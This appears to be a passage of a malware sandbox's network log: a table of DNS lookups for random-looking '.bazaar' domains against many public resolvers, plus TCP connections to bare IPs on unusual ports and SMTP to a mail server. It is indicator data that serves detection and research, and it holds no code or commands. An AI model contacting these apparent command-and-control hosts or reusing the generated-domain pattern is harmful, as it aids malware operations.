| FR | 163.172.185.51:53 | cadgikcbfgiq.bazaar | udp |
| FR | 87.98.175.85:53 | cadgikcbfgiq.bazaar | udp |
| FR | 5.135.183.146:53 | cadgikcbfgiq.bazaar | udp |
| FR | 51.255.48.78:53 | cadgikcbfgiq.bazaar | udp |
| FR | 188.165.200.156:53 | cadgikcbfgiq.bazaar | udp |
| FR | 147.135.185.78:53 | cadgikcbfgiq.bazaar | udp |
| FR | 92.222.97.145:53 | cadgikcbfgiq.bazaar | udp |
| FR | 51.255.211.146:53 | cadgikcbfgiq.bazaar | udp |
| GB | 159.89.249.249:53 | cadgikcbfgiq.bazaar | udp |
| GB | 104.238.186.189:53 | cadgikcbfgiq.bazaar | udp |
| US | 96.41.93.96:443 | tcp | |
| IN | 139.59.23.241:53 | cadgikcbfgiq.bazaar | udp |
| IT | 193.183.98.66:53 | cadgikcbfgiq.bazaar | udp |
| IT | 94.177.171.127:53 | cadgikcbfgiq.bazaar | udp |
| JP | 45.63.124.65:53 | cadgikcbfgiq.bazaar | udp |
| LT | 212.24.98.54:53 | cadgikcbfgiq.bazaar | udp |
| MD | 178.17.170.179:53 | cadgikcbfgiq.bazaar | udp |
| NL | 185.208.208.141:53 | cadgikcbfgiq.bazaar | udp |
| NL | 82.196.9.45:53 | cadgikcbfgiq.bazaar | udp |
| NL | 146.185.176.36:53 | cadgikcbfgiq.bazaar | udp |
| SE | 89.35.39.64:53 | cadgikcbfgiq.bazaar | udp |
| RO | 89.18.27.167:53 | cadgikcbfgiq.bazaar | udp |
| RU | 77.73.68.161:53 | cadgikcbfgiq.bazaar | udp |
| RU | 91.217.137.37:53 | cadgikcbfgiq.bazaar | udp |
| RU | 185.117.154.144:53 | cadgikcbfgiq.bazaar | udp |
| SE | 176.126.70.119:53 | cadgikcbfgiq.bazaar | udp |
| SG | 139.99.96.146:53 | cadgikcbfgiq.bazaar | udp |
| BE | 74.125.206.16:465 | smtp.googlemail.com | tcp |
| UA | 217.12.210.54:53 | cadgikcbfgiq.bazaar | udp |
| GB | 185.164.136.225:53 | cadgikcbfgiq.bazaar | udp |
| US | 192.52.166.110:53 | cadgikcbfgiq.bazaar | udp |
| US | 96.41.93.96:443 | tcp | |
| US | 63.231.92.27:53 | cadgikcbfgiq.bazaar | udp |
| CA | 66.70.211.246:53 | cadgikcbfgiq.bazaar | udp |
| US | 96.47.228.108:53 | cadgikcbfgiq.bazaar | udp |
| US | 45.32.160.206:53 | cadgikcbfgiq.bazaar | udp |
| US | 128.52.130.209:53 | cadgikcbfgiq.bazaar | udp |
| US | 35.196.105.24:53 | cadgikcbfgiq.bazaar | udp |
| US | 172.98.193.42:53 | cadgikcbfgiq.bazaar | udp |
| US | 162.248.241.94:53 | cadgikcbfgiq.bazaar | udp |
| US | 107.172.42.186:53 | cadgikcbfgiq.bazaar | udp |
| US | 167.99.153.82:53 | cadgikcbfgiq.bazaar | udp |
| US | 138.197.25.214:53 | cadgikcbfgiq.bazaar | udp |
| US | 69.164.196.21:53 | cadgikcbfgiq.bazaar | udp |
| FR | 51.254.25.115:53 | abfgikachgiq.bazaar | udp |
| IT | 193.183.98.66:53 | abfgikachgiq.bazaar | udp |
| RU | 91.217.137.37:53 | abfgikachgiq.bazaar | udp |
| FR | 87.98.175.85:53 | abfgikachgiq.bazaar | udp |
| AT | 185.121.177.177:53 | abfgikachgiq.bazaar | udp |
| UA | 77.52.245.101:8008 | tcp | |
| US | 3.33.130.190:80 | www.lizoschwald.com | tcp |
| ZA | 169.239.202.202:53 | abfgikachgiq.bazaar | udp |
| US | 198.251.90.143:53 | abfgikachgiq.bazaar | udp |
| AT | 5.132.191.104:53 | abfgikachgiq.bazaar | udp |
| AU | 111.67.20.8:53 | abfgikachgiq.bazaar | udp |
| AU | 163.53.248.170:53 | abfgikachgiq.bazaar | udp |
| CA | 142.4.204.111:53 | abfgikachgiq.bazaar | udp |
| DE | 87.106.46.107:8080 | tcp | |
| CA | 142.4.205.47:53 | abfgikachgiq.bazaar | udp |
| BD | 103.106.236.83:8080 | tcp | |
| CA | 158.69.239.167:53 | abfgikachgiq.bazaar | udp |
| CA | 104.37.195.178:53 | abfgikachgiq.bazaar | udp |
| CA | 192.99.85.244:53 | abfgikachgiq.bazaar | udp |
| CA | 158.69.160.164:53 | abfgikachgiq.bazaar | udp |
| CH | 46.28.207.199:53 | abfgikachgiq.bazaar | udp |
| CH | 31.171.251.118:53 | abfgikachgiq.bazaar | udp |
| CZ | 81.2.241.148:53 | abfgikachgiq.bazaar | udp |
| FR | 51.254.25.115:53 | abfgikachgiq.bazaar | udp |
| DE | 82.141.39.32:53 | abfgikachgiq.bazaar | udp |
| DE | 50.3.82.215:53 | abfgikachgiq.bazaar | udp |
| DE | 46.101.70.183:53 | abfgikachgiq.bazaar | udp |
| DE | 5.45.97.127:53 | abfgikachgiq.bazaar | udp |
| DE | 130.255.78.223:53 | abfgikachgiq.bazaar | udp |
| DE | 144.76.133.38:53 | abfgikachgiq.bazaar | udp |
| DE | 139.59.208.246:53 | abfgikachgiq.bazaar | udp |
| DE | 172.104.136.243:53 | abfgikachgiq.bazaar | udp |
| EC | 45.71.112.70:53 | abfgikachgiq.bazaar | udp |
| FR | 163.172.185.51:53 | abfgikachgiq.bazaar | udp |
| FR | 87.98.175.85:53 | abfgikachgiq.bazaar | udp |
| FR | 5.135.183.146:53 | abfgikachgiq.bazaar | udp |
| FR | 51.255.48.78:53 | abfgikachgiq.bazaar | udp |
| FR | 188.165.200.156:53 | abfgikachgiq.bazaar | udp |
| FR | 147.135.185.78:53 | abfgikachgiq.bazaar | udp |
| FR | 92.222.97.145:53 | abfgikachgiq.bazaar | udp |
| FR | 51.255.211.146:53 | abfgikachgiq.bazaar | udp |
| GB | 159.89.249.249:53 | abfgikachgiq.bazaar | udp |
| GB | 104.238.186.189:53 | abfgikachgiq.bazaar | udp |
| IN | 139.59.23.241:53 | abfgikachgiq.bazaar | udp |
| IT | 193.183.98.66:53 | abfgikachgiq.bazaar | udp |
| IT | 94.177.171.127:53 | abfgikachgiq.bazaar | udp |
| JP | 45.63.124.65:53 | abfgikachgiq.bazaar | udp |
| LT | 212.24.98.54:53 | abfgikachgiq.bazaar | udp |
| MD | 178.17.170.179:53 | abfgikachgiq.bazaar | udp |
| NL | 185.208.208.141:53 | abfgikachgiq.bazaar | udp |
| NL | 82.196.9.45:53 | abfgikachgiq.bazaar | udp |
| NL | 146.185.176.36:53 | abfgikachgiq.bazaar | udp |
| SE | 89.35.39.64:53 | abfgikachgiq.bazaar | udp |
| RO | 89.18.27.167:53 | abfgikachgiq.bazaar | udp |
| RU | 77.73.68.161:53 | abfgikachgiq.bazaar | udp |
| RU | 91.217.137.37:53 | abfgikachgiq.bazaar | udp |
| RU | 185.117.154.144:53 | abfgikachgiq.bazaar | udp |
| SE | 176.126.70.119:53 | abfgikachgiq.bazaar | udp |
| SG | 139.99.96.146:53 | abfgikachgiq.bazaar | udp |
| UA | 217.12.210.54:53 | abfgikachgiq.bazaar | udp |
| GB | 185.164.136.225:53 | abfgikachgiq.bazaar | udp |
| US | 192.52.166.110:53 | abfgikachgiq.bazaar | udp |
| US | 63.231.92.27:53 | abfgikachgiq.bazaar | udp |
| CA | 66.70.211.246:53 | abfgikachgiq.bazaar | udp |
| US | 96.47.228.108:53 | abfgikachgiq.bazaar | udp |
| US | 45.32.160.206:53 | abfgikachgiq.bazaar | udp |
| US | 128.52.130.209:53 | abfgikachgiq.bazaar | udp |
| US | 35.196.105.24:53 | abfgikachgiq.bazaar | udp |
| US | 172.98.193.42:53 | abfgikachgiq.bazaar | udp |
| US | 162.248.241.94:53 | abfgikachgiq.bazaar | udp |
| US | 107.172.42.186:53 | abfgikachgiq.bazaar | udp |
| US | 167.99.153.82:53 | abfgikachgiq.bazaar | udp |
| US | 138.197.25.214:53 | abfgikachgiq.bazaar | udp |
| US | 69.164.196.21:53 | abfgikachgiq.bazaar | udp |
| FR | 51.254.25.115:53 | afehkkagghkq.bazaar | udp |
| IT | 193.183.98.66:53 | afehkkagghkq.bazaar | udp |
| RU | 91.217.137.37:53 | afehkkagghkq.bazaar | udp |
| FR | 87.98.175.85:53 | afehkkagghkq.bazaar | udp |
| AT | 185.121.177.177:53 | afehkkagghkq.bazaar | udp |
| ZA | 169.239.202.202:53 | afehkkagghkq.bazaar | udp |
| US | 198.251.90.143:53 | afehkkagghkq.bazaar | udp |
| AT | 5.132.191.104:53 | afehkkagghkq.bazaar | udp |
| AU | 111.67.20.8:53 | afehkkagghkq.bazaar | udp |
| AU | 163.53.248.170:53 | afehkkagghkq.bazaar | udp |
| CA | 142.4.204.111:53 | afehkkagghkq.bazaar | udp |
| CA | 142.4.205.47:53 | afehkkagghkq.bazaar | udp |
| CA | 158.69.239.167:53 | afehkkagghkq.bazaar | udp |
| CA | 104.37.195.178:53 | afehkkagghkq.bazaar | udp |
| CA | 192.99.85.244:53 | afehkkagghkq.bazaar | udp |
| CA | 158.69.160.164:53 | afehkkagghkq.bazaar | udp |
| CH | 46.28.207.199:53 | afehkkagghkq.bazaar | udp |
| CH | 31.171.251.118:53 | afehkkagghkq.bazaar | udp |
| CZ | 81.2.241.148:53 | afehkkagghkq.bazaar | udp |
| FR | 51.254.25.115:53 | afehkkagghkq.bazaar | udp |
| DE | 82.141.39.32:53 | afehkkagghkq.bazaar | udp |
| DE | 50.3.82.215:53 | afehkkagghkq.bazaar | udp |
| DE | 46.101.70.183:53 | afehkkagghkq.bazaar | udp |
| DE | 5.45.97.127:53 | afehkkagghkq.bazaar | udp |
| DE | 130.255.78.223:53 | afehkkagghkq.bazaar | udp |
| DE | 144.76.133.38:53 | afehkkagghkq.bazaar | udp |
| DE | 139.59.208.246:53 | afehkkagghkq.bazaar | udp |
| DE | 172.104.136.243:53 | afehkkagghkq.bazaar | udp |
| EC | 45.71.112.70:53 | afehkkagghkq.bazaar | udp |
| FR | 163.172.185.51:53 | afehkkagghkq.bazaar | udp |
| FR | 87.98.175.85:53 | afehkkagghkq.bazaar | udp |
| FR | 5.135.183.146:53 | afehkkagghkq.bazaar | udp |
| FR | 51.255.48.78:53 | afehkkagghkq.bazaar | udp |
| FR | 188.165.200.156:53 | afehkkagghkq.bazaar | udp |
| FR | 147.135.185.78:53 | afehkkagghkq.bazaar | udp |
| FR | 92.222.97.145:53 | afehkkagghkq.bazaar | udp |
| FR | 51.255.211.146:53 | afehkkagghkq.bazaar | udp |
| GB | 159.89.249.249:53 | afehkkagghkq.bazaar | udp |
| GB | 104.238.186.189:53 | afehkkagghkq.bazaar | udp |
| IN | 139.59.23.241:53 | afehkkagghkq.bazaar | udp |
| IT | 193.183.98.66:53 | afehkkagghkq.bazaar | udp |
| IT | 94.177.171.127:53 | afehkkagghkq.bazaar | udp |
| JP | 45.63.124.65:53 | afehkkagghkq.bazaar | udp |
| LT | 212.24.98.54:53 | afehkkagghkq.bazaar | udp |
| MD | 178.17.170.179:53 | afehkkagghkq.bazaar | udp |
| NL | 185.208.208.141:53 | afehkkagghkq.bazaar | udp |
| NL | 82.196.9.45:53 | afehkkagghkq.bazaar | udp |
| NL | 146.185.176.36:53 | afehkkagghkq.bazaar | udp |
| SE | 89.35.39.64:53 | afehkkagghkq.bazaar | udp |
| RO | 89.18.27.167:53 | afehkkagghkq.bazaar | udp |
| RU | 77.73.68.161:53 | afehkkagghkq.bazaar | udp |
| RU | 91.217.137.37:53 | afehkkagghkq.bazaar | udp |
| RU | 185.117.154.144:53 | afehkkagghkq.bazaar | udp |
| SE | 176.126.70.119:53 | afehkkagghkq.bazaar | udp |
| SG | 139.99.96.146:53 | afehkkagghkq.bazaar | udp |
| UA | 217.12.210.54:53 | afehkkagghkq.bazaar | udp |
| GB | 185.164.136.225:53 | afehkkagghkq.bazaar | udp |
| US | 192.52.166.110:53 | afehkkagghkq.bazaar | udp |
| US | 63.231.92.27:53 | afehkkagghkq.bazaar | udp |
| CA | 66.70.211.246:53 | afehkkagghkq.bazaar | udp |
| US | 96.47.228.108:53 | afehkkagghkq.bazaar | udp |
| US | 45.32.160.206:53 | afehkkagghkq.bazaar | udp |
| US | 128.52.130.209:53 | afehkkagghkq.bazaar | udp |
| US | 35.196.105.24:53 | afehkkagghkq.bazaar | udp |
| US | 172.98.193.42:53 | afehkkagghkq.bazaar | udp |
| US | 162.248.241.94:53 | afehkkagghkq.bazaar | udp |
| US | 107.172.42.186:53 | afehkkagghkq.bazaar | udp |
| US | 167.99.153.82:53 | afehkkagghkq.bazaar | udp |
| US | 138.197.25.214:53 | afehkkagghkq.bazaar | udp |
| US | 69.164.196.21:53 | afehkkagghkq.bazaar | udp |
| FR | 51.254.25.115:53 | dcfgilddhgir.bazaar | udp |
| IT | 193.183.98.66:53 | dcfgilddhgir.bazaar | udp |
| RU | 91.217.137.37:53 | dcfgilddhgir.bazaar | udp |
| FR | 87.98.175.85:53 | dcfgilddhgir.bazaar | udp |
| AT | 185.121.177.177:53 | dcfgilddhgir.bazaar | udp |
| ZA | 169.239.202.202:53 | dcfgilddhgir.bazaar | udp |
| CA | 158.69.160.164:53 | aeeeikafgeiq.bazaar | udp |
| CH | 46.28.207.199:53 | aeeeikafgeiq.bazaar | udp |
| CH | 31.171.251.118:53 | aeeeikafgeiq.bazaar | udp |
| CZ | 81.2.241.148:53 | aeeeikafgeiq.bazaar | udp |
| FR | 51.254.25.115:53 | aeeeikafgeiq.bazaar | udp |
| DE | 82.141.39.32:53 | aeeeikafgeiq.bazaar | udp |
| DE | 50.3.82.215:53 | aeeeikafgeiq.bazaar | udp |
| DE | 46.101.70.183:53 | aeeeikafgeiq.bazaar | udp |
| DE | 5.45.97.127:53 | aeeeikafgeiq.bazaar | udp |
| DE | 130.255.78.223:53 | aeeeikafgeiq.bazaar | udp |
| DE | 144.76.133.38:53 | aeeeikafgeiq.bazaar | udp |
| DE | 139.59.208.246:53 | aeeeikafgeiq.bazaar | udp |
| DE | 172.104.136.243:53 | aeeeikafgeiq.bazaar | udp |
| EC | 45.71.112.70:53 | aeeeikafgeiq.bazaar | udp |
| FR | 163.172.185.51:53 | aeeeikafgeiq.bazaar | udp |
| FR | 87.98.175.85:53 | aeeeikafgeiq.bazaar | udp |
| FR | 5.135.183.146:53 | aeeeikafgeiq.bazaar | udp |
| FR | 51.255.48.78:53 | aeeeikafgeiq.bazaar | udp |
| FR | 188.165.200.156:53 | aeeeikafgeiq.bazaar | udp |
| FR | 147.135.185.78:53 | aeeeikafgeiq.bazaar | udp |
| FR | 92.222.97.145:53 | aeeeikafgeiq.bazaar | udp |
| FR | 51.255.211.146:53 | aeeeikafgeiq.bazaar | udp |
| GB | 159.89.249.249:53 | aeeeikafgeiq.bazaar | udp |
| GB | 104.238.186.189:53 | aeeeikafgeiq.bazaar | udp |
| IN | 139.59.23.241:53 | aeeeikafgeiq.bazaar | udp |
| IT | 193.183.98.66:53 | aeeeikafgeiq.bazaar | udp |
| IT | 94.177.171.127:53 | aeeeikafgeiq.bazaar | udp |
| JP | 45.63.124.65:53 | aeeeikafgeiq.bazaar | udp |
| LT | 212.24.98.54:53 | aeeeikafgeiq.bazaar | udp |
| MD | 178.17.170.179:53 | aeeeikafgeiq.bazaar | udp |
| NL | 185.208.208.141:53 | aeeeikafgeiq.bazaar | udp |
| NL | 82.196.9.45:53 | aeeeikafgeiq.bazaar | udp |
| NL | 146.185.176.36:53 | aeeeikafgeiq.bazaar | udp |
| SE | 89.35.39.64:53 | aeeeikafgeiq.bazaar | udp |
| RO | 89.18.27.167:53 | aeeeikafgeiq.bazaar | udp |
| RU | 77.73.68.161:53 | aeeeikafgeiq.bazaar | udp |
| RU | 91.217.137.37:53 | aeeeikafgeiq.bazaar | udp |
| RU | 185.117.154.144:53 | aeeeikafgeiq.bazaar | udp |
| SE | 176.126.70.119:53 | aeeeikafgeiq.bazaar | udp |
| SG | 139.99.96.146:53 | aeeeikafgeiq.bazaar | udp |
| UA | 217.12.210.54:53 | aeeeikafgeiq.bazaar | udp |
| GB | 185.164.136.225:53 | aeeeikafgeiq.bazaar | udp |
| US | 192.52.166.110:53 | aeeeikafgeiq.bazaar | udp |
| US | 63.231.92.27:53 | aeeeikafgeiq.bazaar | udp |
| CA | 66.70.211.246:53 | aeeeikafgeiq.bazaar | udp |
| US | 96.47.228.108:53 | aeeeikafgeiq.bazaar | udp |
| US | 45.32.160.206:53 | aeeeikafgeiq.bazaar | udp |
| US | 128.52.130.209:53 | aeeeikafgeiq.bazaar | udp |
| US | 35.196.105.24:53 | aeeeikafgeiq.bazaar | udp |
| US | 172.98.193.42:53 | aeeeikafgeiq.bazaar | udp |
| US | 162.248.241.94:53 | aeeeikafgeiq.bazaar | udp |
| US | 107.172.42.186:53 | aeeeikafgeiq.bazaar | udp |
| US | 167.99.153.82:53 | aeeeikafgeiq.bazaar | udp |
| US | 138.197.25.214:53 | aeeeikafgeiq.bazaar | udp |
| US | 69.164.196.21:53 | aeeeikafgeiq.bazaar | udp |
| FR | 51.254.25.115:53 | bccfimbdefis.bazaar | udp |
| IT | 193.183.98.66:53 | bccfimbdefis.bazaar | udp |
| RU | 91.217.137.37:53 | bccfimbdefis.bazaar | udp |
| FR | 87.98.175.85:53 | bccfimbdefis.bazaar | udp |
| AT | 185.121.177.177:53 | bccfimbdefis.bazaar | udp |
| ZA | 169.239.202.202:53 | bccfimbdefis.bazaar | udp |
| US | 198.251.90.143:53 | bccfimbdefis.bazaar | udp |
| AT | 5.132.191.104:53 | bccfimbdefis.bazaar | udp |
| AU | 111.67.20.8:53 | bccfimbdefis.bazaar | udp |
| AU | 163.53.248.170:53 | bccfimbdefis.bazaar | udp |
| CA | 142.4.204.111:53 | bccfimbdefis.bazaar | udp |
| CA | 142.4.205.47:53 | bccfimbdefis.bazaar | udp |
| CA | 158.69.239.167:53 | bccfimbdefis.bazaar | udp |
| CA | 104.37.195.178:53 | bccfimbdefis.bazaar | udp |
| CA | 192.99.85.244:53 | bccfimbdefis.bazaar | udp |
| CA | 158.69.160.164:53 | bccfimbdefis.bazaar | udp |
| CH | 46.28.207.199:53 | bccfimbdefis.bazaar | udp |
| CH | 31.171.251.118:53 | bccfimbdefis.bazaar | udp |
| CZ | 81.2.241.148:53 | bccfimbdefis.bazaar | udp |
| FR | 51.254.25.115:53 | bccfimbdefis.bazaar | udp |
| DE | 82.141.39.32:53 | bccfimbdefis.bazaar | udp |
| DE | 50.3.82.215:53 | bccfimbdefis.bazaar | udp |
| DE | 46.101.70.183:53 | bccfimbdefis.bazaar | udp |
| DE | 5.45.97.127:53 | bccfimbdefis.bazaar | udp |
| DE | 130.255.78.223:53 | bccfimbdefis.bazaar | udp |
| DE | 144.76.133.38:53 | bccfimbdefis.bazaar | udp |
| DE | 139.59.208.246:53 | bccfimbdefis.bazaar | udp |
| DE | 172.104.136.243:53 | bccfimbdefis.bazaar | udp |
| EC | 45.71.112.70:53 | bccfimbdefis.bazaar | udp |
| FR | 163.172.185.51:53 | bccfimbdefis.bazaar | udp |
| FR | 87.98.175.85:53 | bccfimbdefis.bazaar | udp |
| FR | 5.135.183.146:53 | bccfimbdefis.bazaar | udp |
| FR | 51.255.48.78:53 | bccfimbdefis.bazaar | udp |
| FR | 188.165.200.156:53 | bccfimbdefis.bazaar | udp |
| FR | 147.135.185.78:53 | bccfimbdefis.bazaar | udp |
| FR | 92.222.97.145:53 | bccfimbdefis.bazaar | udp |
| FR | 51.255.211.146:53 | bccfimbdefis.bazaar | udp |
| GB | 159.89.249.249:53 | bccfimbdefis.bazaar | udp |
| GB | 104.238.186.189:53 | bccfimbdefis.bazaar | udp |
| IN | 139.59.23.241:53 | bccfimbdefis.bazaar | udp |
| IT | 193.183.98.66:53 | bccfimbdefis.bazaar | udp |
| IT | 94.177.171.127:53 | bccfimbdefis.bazaar | udp |
| JP | 45.63.124.65:53 | bccfimbdefis.bazaar | udp |
| LT | 212.24.98.54:53 | bccfimbdefis.bazaar | udp |
| MD | 178.17.170.179:53 | bccfimbdefis.bazaar | udp |
| NL | 185.208.208.141:53 | bccfimbdefis.bazaar | udp |
| NL | 82.196.9.45:53 | bccfimbdefis.bazaar | udp |
| NL | 146.185.176.36:53 | bccfimbdefis.bazaar | udp |
| SE | 89.35.39.64:53 | bccfimbdefis.bazaar | udp |
| RO | 89.18.27.167:53 | bccfimbdefis.bazaar | udp |
| RU | 77.73.68.161:53 | bccfimbdefis.bazaar | udp |
| RU | 91.217.137.37:53 | bccfimbdefis.bazaar | udp |
| RU | 185.117.154.144:53 | bccfimbdefis.bazaar | udp |
| SE | 176.126.70.119:53 | bccfimbdefis.bazaar | udp |
| SG | 139.99.96.146:53 | bccfimbdefis.bazaar | udp |
| UA | 217.12.210.54:53 | bccfimbdefis.bazaar | udp |
| GB | 185.164.136.225:53 | bccfimbdefis.bazaar | udp |
| US | 192.52.166.110:53 | bccfimbdefis.bazaar | udp |
| US | 63.231.92.27:53 | bccfimbdefis.bazaar | udp |
| CA | 66.70.211.246:53 | bccfimbdefis.bazaar | udp |
| US | 96.47.228.108:53 | bccfimbdefis.bazaar | udp |
| US | 45.32.160.206:53 | bccfimbdefis.bazaar | udp |
| US | 128.52.130.209:53 | bccfimbdefis.bazaar | udp |
| US | 35.196.105.24:53 | bccfimbdefis.bazaar | udp |
| US | 172.98.193.42:53 | bccfimbdefis.bazaar | udp |
| US | 162.248.241.94:53 | bccfimbdefis.bazaar | udp |
| US | 107.172.42.186:53 | bccfimbdefis.bazaar | udp |
| US | 167.99.153.82:53 | bccfimbdefis.bazaar | udp |
| US | 138.197.25.214:53 | bccfimbdefis.bazaar | udp |
| US | 69.164.196.21:53 | bccfimbdefis.bazaar | udp |
| FR | 51.254.25.115:53 | ^`egjkzaggjq.bazaar | udp |
| IT | 193.183.98.66:53 | ^`egjkzaggjq.bazaar | udp |
| RU | 91.217.137.37:53 | ^`egjkzaggjq.bazaar | udp |
| FR | 87.98.175.85:53 | ^`egjkzaggjq.bazaar | udp |
| BE | 74.125.206.16:465 | smtp.googlemail.com | tcp |
| AT | 185.121.177.177:53 | ^`egjkzaggjq.bazaar | udp |
| ZA | 169.239.202.202:53 | ^`egjkzaggjq.bazaar | udp |
| US | 198.251.90.143:53 | ^`egjkzaggjq.bazaar | udp |
| AT | 5.132.191.104:53 | ^`egjkzaggjq.bazaar | udp |
| AU | 111.67.20.8:53 | ^`egjkzaggjq.bazaar | udp |
| US | 206.51.202.106:50003 | tcp | |
| AU | 163.53.248.170:53 | ^`egjkzaggjq.bazaar | udp |
| CA | 142.4.204.111:53 | ^`egjkzaggjq.bazaar | udp |
| CA | 142.4.205.47:53 | ^`egjkzaggjq.bazaar | udp |
| CA | 158.69.239.167:53 | ^`egjkzaggjq.bazaar | udp |
| CA | 104.37.195.178:53 | ^`egjkzaggjq.bazaar | udp |
| CA | 192.99.85.244:53 | ^`egjkzaggjq.bazaar | udp |
| CA | 158.69.160.164:53 | ^`egjkzaggjq.bazaar | udp |
| CH | 46.28.207.199:53 | ^`egjkzaggjq.bazaar | udp |
| CH | 31.171.251.118:53 | ^`egjkzaggjq.bazaar | udp |
| CZ | 81.2.241.148:53 | ^`egjkzaggjq.bazaar | udp |
| FR | 51.254.25.115:53 | ^`egjkzaggjq.bazaar | udp |
| DE | 82.141.39.32:53 | ^`egjkzaggjq.bazaar | udp |
| DE | 50.3.82.215:53 | ^`egjkzaggjq.bazaar | udp |
| DE | 46.101.70.183:53 | ^`egjkzaggjq.bazaar | udp |
| DE | 5.45.97.127:53 | ^`egjkzaggjq.bazaar | udp |
| DE | 130.255.78.223:53 | ^`egjkzaggjq.bazaar | udp |
| DE | 144.76.133.38:53 | ^`egjkzaggjq.bazaar | udp |
| DE | 139.59.208.246:53 | ^`egjkzaggjq.bazaar | udp |
| DE | 172.104.136.243:53 | ^`egjkzaggjq.bazaar | udp |
| EC | 45.71.112.70:53 | ^`egjkzaggjq.bazaar | udp |
| FR | 163.172.185.51:53 | ^`egjkzaggjq.bazaar | udp |
| FR | 87.98.175.85:53 | ^`egjkzaggjq.bazaar | udp |
| FR | 5.135.183.146:53 | ^`egjkzaggjq.bazaar | udp |
| FR | 51.255.48.78:53 | ^`egjkzaggjq.bazaar | udp |
| FR | 188.165.200.156:53 | ^`egjkzaggjq.bazaar | udp |
| FR | 147.135.185.78:53 | ^`egjkzaggjq.bazaar | udp |
| FR | 92.222.97.145:53 | ^`egjkzaggjq.bazaar | udp |
| FR | 51.255.211.146:53 | ^`egjkzaggjq.bazaar | udp |
| GB | 159.89.249.249:53 | ^`egjkzaggjq.bazaar | udp |
| GB | 104.238.186.189:53 | ^`egjkzaggjq.bazaar | udp |
| IN | 139.59.23.241:53 | ^`egjkzaggjq.bazaar | udp |
| IT | 193.183.98.66:53 | ^`egjkzaggjq.bazaar | udp |
| IT | 94.177.171.127:53 | ^`egjkzaggjq.bazaar | udp |
| JP | 45.63.124.65:53 | ^`egjkzaggjq.bazaar | udp |
| LT | 212.24.98.54:53 | ^`egjkzaggjq.bazaar | udp |
| MD | 178.17.170.179:53 | ^`egjkzaggjq.bazaar | udp |
| NL | 185.208.208.141:53 | ^`egjkzaggjq.bazaar | udp |
| NL | 82.196.9.45:53 | ^`egjkzaggjq.bazaar | udp |
| NL | 146.185.176.36:53 | ^`egjkzaggjq.bazaar | udp |
| SE | 89.35.39.64:53 | ^`egjkzaggjq.bazaar | udp |
| RO | 89.18.27.167:53 | ^`egjkzaggjq.bazaar | udp |
| RU | 77.73.68.161:53 | ^`egjkzaggjq.bazaar | udp |
| RU | 91.217.137.37:53 | ^`egjkzaggjq.bazaar | udp |
| RU | 185.117.154.144:53 | ^`egjkzaggjq.bazaar | udp |
| SE | 176.126.70.119:53 | ^`egjkzaggjq.bazaar | udp |
| SG | 139.99.96.146:53 | ^`egjkzaggjq.bazaar | udp |
| UA | 217.12.210.54:53 | ^`egjkzaggjq.bazaar | udp |
| GB | 185.164.136.225:53 | ^`egjkzaggjq.bazaar | udp |
| US | 192.52.166.110:53 | ^`egjkzaggjq.bazaar | udp |
| US | 63.231.92.27:53 | ^`egjkzaggjq.bazaar | udp |
| CA | 66.70.211.246:53 | ^`egjkzaggjq.bazaar | udp |
| US | 96.47.228.108:53 | ^`egjkzaggjq.bazaar | udp |
| US | 45.32.160.206:53 | ^`egjkzaggjq.bazaar | udp |
| US | 128.52.130.209:53 | ^`egjkzaggjq.bazaar | udp |
| US | 35.196.105.24:53 | ^`egjkzaggjq.bazaar | udp |
| US | 172.98.193.42:53 | ^`egjkzaggjq.bazaar | udp |
| US | 162.248.241.94:53 | ^`egjkzaggjq.bazaar | udp |
| US | 107.172.42.186:53 | ^`egjkzaggjq.bazaar | udp |
| US | 167.99.153.82:53 | ^`egjkzaggjq.bazaar | udp |
| US | 138.197.25.214:53 | ^`egjkzaggjq.bazaar | udp |
| US | 69.164.196.21:53 | ^`egjkzaggjq.bazaar | udp |
| FR | 51.254.25.115:53 | `beghkzcgghq.bazaar | udp |
| IT | 193.183.98.66:53 | `beghkzcgghq.bazaar | udp |
| RU | 91.217.137.37:53 | `beghkzcgghq.bazaar | udp |
| FR | 87.98.175.85:53 | `beghkzcgghq.bazaar | udp |
| AT | 185.121.177.177:53 | `beghkzcgghq.bazaar | udp |
| ZA | 169.239.202.202:53 | `beghkzcgghq.bazaar | udp |
| US | 198.251.90.143:53 | `beghkzcgghq.bazaar | udp |
| US | 71.197.211.156:80 | tcp | |
| AT | 5.132.191.104:53 | `beghkzcgghq.bazaar | udp |
| AU | 111.67.20.8:53 | `beghkzcgghq.bazaar | udp |
| AU | 163.53.248.170:53 | `beghkzcgghq.bazaar | udp |
| CA | 142.4.204.111:53 | `beghkzcgghq.bazaar | udp |
| CA | 142.4.205.47:53 | `beghkzcgghq.bazaar | udp |
| US | 206.51.202.106:50003 | tcp | |
| CA | 158.69.239.167:53 | `beghkzcgghq.bazaar | udp |
| CA | 104.37.195.178:53 | `beghkzcgghq.bazaar | udp |
| CA | 192.99.85.244:53 | `beghkzcgghq.bazaar | udp |
| CA | 158.69.160.164:53 | `beghkzcgghq.bazaar | udp |
| KR | 121.124.124.40:7080 | tcp | |
| CH | 46.28.207.199:53 | `beghkzcgghq.bazaar | udp |
| UA | 77.52.245.101:8008 | tcp | |
| CH | 31.171.251.118:53 | `beghkzcgghq.bazaar | udp |
| CZ | 81.2.241.148:53 | `beghkzcgghq.bazaar | udp |
| FR | 51.254.25.115:53 | `beghkzcgghq.bazaar | udp |
| DE | 82.141.39.32:53 | `beghkzcgghq.bazaar | udp |
| DE | 50.3.82.215:53 | `beghkzcgghq.bazaar | udp |
| DE | 46.101.70.183:53 | `beghkzcgghq.bazaar | udp |
| DE | 5.45.97.127:53 | `beghkzcgghq.bazaar | udp |
| DE | 130.255.78.223:53 | `beghkzcgghq.bazaar | udp |
| DE | 144.76.133.38:53 | `beghkzcgghq.bazaar | udp |
| DE | 139.59.208.246:53 | `beghkzcgghq.bazaar | udp |
| DE | 172.104.136.243:53 | `beghkzcgghq.bazaar | udp |
| MY | 219.92.8.17:8080 | tcp | |
| EC | 45.71.112.70:53 | `beghkzcgghq.bazaar | udp |
| FR | 163.172.185.51:53 | `beghkzcgghq.bazaar | udp |
| FR | 87.98.175.85:53 | `beghkzcgghq.bazaar | udp |
| FR | 5.135.183.146:53 | `beghkzcgghq.bazaar | udp |
| FR | 51.255.48.78:53 | `beghkzcgghq.bazaar | udp |
| FR | 188.165.200.156:53 | `beghkzcgghq.bazaar | udp |
| FR | 147.135.185.78:53 | `beghkzcgghq.bazaar | udp |
| FR | 92.222.97.145:53 | `beghkzcgghq.bazaar | udp |
| FR | 51.255.211.146:53 | `beghkzcgghq.bazaar | udp |
| JP | 114.146.222.200:80 | tcp | |
